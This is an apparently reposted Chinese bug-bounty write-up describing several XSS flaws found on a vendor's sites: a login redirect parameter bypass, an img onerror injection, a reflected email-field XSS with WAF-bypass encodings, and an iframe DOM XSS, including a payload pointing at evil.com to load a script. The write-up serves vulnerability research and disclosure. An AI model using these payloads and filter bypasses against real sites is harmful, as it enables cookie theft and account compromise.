服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

实战|SRC挖掘初探之随缘XSS挖掘

日期: 来源:菜鸟学信安收集编辑:hpdoger

最近试着去学挖洞,在测某SRC的一些业务时发现以下几个XSS的点。对于一些请求参数在返回的html中以隐蔽的标签形式出现的XSS,感觉还是挺常见的。这里我写了个Bp的插件用来监听请求并捕获这种情况:SuperTags(https://github.com/Hpd0ger/SuperTags)

下面的案例和讨论如果有什么片面或错误的地方,还望师傅们斧正

登陆跳转处XSS

某处登陆页面看了眼表单,同时跟进事件绑定的对象utils

直接截出登陆验证部分,redata是响应参数,登陆成功为0。host定义为normal.com。这里发现其实在登陆的时候是可以存在一个cb参数的(但之前我登陆的时候并没有察觉,因为是后台有个功能loginout,点击才会附带cb参数到登录页)

其中,getparam方法如下
getParam: function(c_name) {
var urlParams = location.href;
var c_start = urlParams.indexOf(c_name + "=");銆€
if (c_start != -1) {
c_start = c_start + c_name.length + 1;銆€
c_end = urlParams.indexOf("&", c_start);
if (c_end == -1) {
c_end = urlParams.length;
}
return urlParams.substring(c_start, c_end);
}else{
return null;
}
},
这里开发者还是对cb参数进行了意识形态的过滤,如果cb不包含host则强制重定向首页。但是略鸡肋,直接把host放在注释符后就能绕过。

POC:
cb=javascript:alert(document.cookie);//normal.com

Image处的XSS

这是该厂商的一个移动端业务,在我测之前已经有表哥X进去了,看一下这个洞是如何产生的。
功能点:提交问题反馈,可以上传问题图片

漏洞逻辑:
上传图片->提交反馈->服务端拼接提交的img参数(uri)为img标签src属性的完整地址
测试上传一个图片后,点击提交反馈并抓包,imglist参数是刚才上传图片返回的uri地址。

POST xxxx?q=index/feedback HTTP/1.1

imglist=%2Cpicture%2F2019%2F02%2F22%2F_a948b4eeaca7420cad9d54fdb0331230.jpg&
问题就出在拼接标签这部分,修改imglist参数就可以闭合Src属性进行xss,使最终的img标签执行onerror事件
步骤:抓包修改img路径->拼接恶意js事件,POC:
imglist=urlencode(" onerror="alert(`XSS�`)">

成功弹窗

邮件提交处的XSS

在测试某业务的邮箱密码验证时,发现一个包含请求邮箱的页面。

记得之前看过一篇文章,有些服务在发送完邮件后会弹出一个“邮件已发送+email”的页面导致反射型XSS,感觉就是这种了。
随手测试了一下,发现直接waf了空格、双引号、尖括号,和"\"。实体了html编码的尖括号,但是没有实体html编码的双引号。

同时在FUZZ的期间多次出现参数错误的请求,发现可能是应用层做了些过滤:
  1. email字符串长度<40且@结尾
  2. 不能同时出现两个双引号、括号
  3. 正则alert(1)\prompt(1)\confim...
不过只要脱离引号就好说,毕竟有很多JS事件可以调。一开始把眼光放在了input标签上测试了一些on事件,发现type是hidden,一些可视on事件都没用的。记得之前看过一个input hidden xss的一个用法是按alt+shift+x触发,poc如下
urlencode(email=&#34/accesskey=&#34X&#34/onclick=&#34alert&#40'xss'&#41&#34@qq.com)

但是这个poc很鸡肋。因为要打出cookie的话长度受限,且利用条件苛刻(firefox+按键)
回头看了下发现有form标签也有输出点,最初以为form能执行的JS事件就只有reset和submit,后来测试跑onmounseover也能弹框。
encodeurl(email=&#34/onmouseover=&#34alert&#40document.cookie&#41&#34@qq.com)

一个受阻的XSS

在测试某业务时发现一个有趣的参数拼接点:
iframe的src拼接url参数+后端给定的第三方host->iframe加载src
测试了一下特殊字符都给实体化了,但是又舍不得一个iframe

经过一番寻找,发现第三方服务的登陆点存在JS跳转漏洞,用iframe加载这个第三方服务的dom-xss也能造成弹框效果

虽然是在SRC业务站点弹的框,但真正的域应该是子页面的。打印一下COOKIE验证,果然是子页面域的cookie。由于waf掉了document.cookie和javascript:alert,我用了html编码的':'和八进制js编码的'.'绕过,完整打印子页面域payload如下
https://src.com?url=redirect_uri%3Djavascript%26%23x3A%3Bconsole.log(document\56cookie)
在进一步的探索中,我做了两个尝试:
1. 尝试跳一个外域的JS,看能不能把src属性转到这个js
https://src.com?url=redirect_uri%3Dhttps://evil.com/xss.js
但是会把资源解析到子页面的document里,而不是src的改变

2. iframe是否能调用父页面的事件呢(document)?如果可以的话我们就直接调js uri把cookie打出去。之所以有这个想法是因为,当时寻思既然站点调用这个三方服务了,很大可能性这个三方站是iframe-src白名单。不过测试后发现依然被跨域限制,测试payload

https://src.com?url=redirect_uri%3Djavascript%26%23x3A%3Bconsole.log(window.parent.document\56cookie)

对跨域姿势了解的不多,如果有兴趣的师傅,可以一起来交流一下这种问题

自闭总结

从打ctf到学着去挖洞,还是有一些思维出入的地方,慢慢理解之前师傅们说的资产收集的重要性。
也特别感谢引路人鬼麦子师傅给予的帮助,这里顺便推荐麦子师傅基于爬虫的一款开源子域名监控工具get_domain,在搭建过程中如果遇到环境配置问题,可以参考这篇Ubuntu16.04-Get_domain搭建手册
作者:hpdoger,来源:先知社区

相关阅读

  • 实战|一次不完美的Jboss渗透

  • 一.前言最近做渗透测试中遇到一个jboss的站,在其中学到一些在乙方工作挺有用的技巧(这次测试是进过授权测试)在次分享一下二.信息收集先通过namp进行扫描,同时进行目录扫描,发现8
  • 简单,用 Python 实现 A/B 测试!

  • A/B测试,通过分析两种不同的营销策略,以此来选择最佳的营销策略,可以高效地将流量转化为销售额(或转化为你的预期目标)。有助于找到更好的方法来寻找客户、营销产品、扩大影响范
  • 针对某集团的一次渗透测试

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 变温粉末操作流程(旧文重发)

  • 想测试材料高温的稳定性,需要用到变温粉末衍射,操作如下:变温粉末操作流程:首先在普通样品台测试样品;拆掉样品台:用内六角拧开三个螺丝,逆时针旋转,台子很重,不要滑落;安装变温台:将检
  • Nature官宣:新增这类论文,研究成果不重要!

  • 1.新增类别近日,Nature发表社论,里面提到Nature将在发表内容中新增一类研究论文,称为“注册报告”(Registered Reports),旨在鼓励严谨性和可复制性。今年是Nature决定对所有论文进
  • 榆林市2023年上半年普通话水平测试报名公告

  • 根据《陕西省2023年上半年面向社会人员开展普通话水平测试工作的公告》要求,现就我市2023年上半年普通话水平测试报名事项公告如下:一、测试对象1.年满18周岁以上有测试需求的
  • ChatGPT火爆背后,自带AI基因云测推进数字化

  • 近期,科技领域最出圈的莫过于ChatGPT,给社会各行各业带来了巨大的冲击。多数专家预测ChatGPT预示了数字化应用革命加速到来。包括ChatGPT在内的新一代人工智能技术创新突破,将
  • 澧县发现澧水流域首座明代壁画墓葬

  • 近日,湖南文物考古研究院在王家厂镇南河村发现一座绘有壁画的明代古墓。该古墓为浇浆合葬墓,长约3米、宽2.5米、高1.5米,墓室顶部呈拱形,不仅在墓中发现了以花木为主题的壁画,还

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 实战|SRC挖掘初探之随缘XSS挖掘

  • 最近试着去学挖洞,在测某SRC的一些业务时发现以下几个XSS的点。对于一些请求参数在返回的html中以隐蔽的标签形式出现的XSS,感觉还是挺常见的。这里我写了个Bp的插件用来监听
  • 2023HW红队工具

  • 知识星球渗透知识库2022年成绩已持续运营3年多,欢迎师傅们加入分享各种干货资源知识星球渗透知识库(HACK之道)汇集最全、最新的安全知识库,内容不限于红队攻防实战、内网渗透、
  • 实战|一次不完美的Jboss渗透

  • 一.前言最近做渗透测试中遇到一个jboss的站,在其中学到一些在乙方工作挺有用的技巧(这次测试是进过授权测试)在次分享一下二.信息收集先通过namp进行扫描,同时进行目录扫描,发现8
  • 一种鼾声,隐藏着致命危险

  • 有一种打鼾不一般!能打到呼吸暂停、憋气甚至憋醒,如果你或身边人打鼾是这种情况,要警惕可能是「睡眠呼吸暂停综合征」,这是一种需要采取治疗的疾病,严重者甚至会危及生命!一、睡眠
  • 耳鸣耳聋是咋回事?直播聊聊耳朵

  • 明天是 3 月 3 日国际爱耳日,我们想直播聊聊耳朵的问题。为了提前了解大家想听什么,我们决定发起一个投票,热门的话题优先聊。明天晚上 19:00 点,丁香医生直播间邀请到了中国科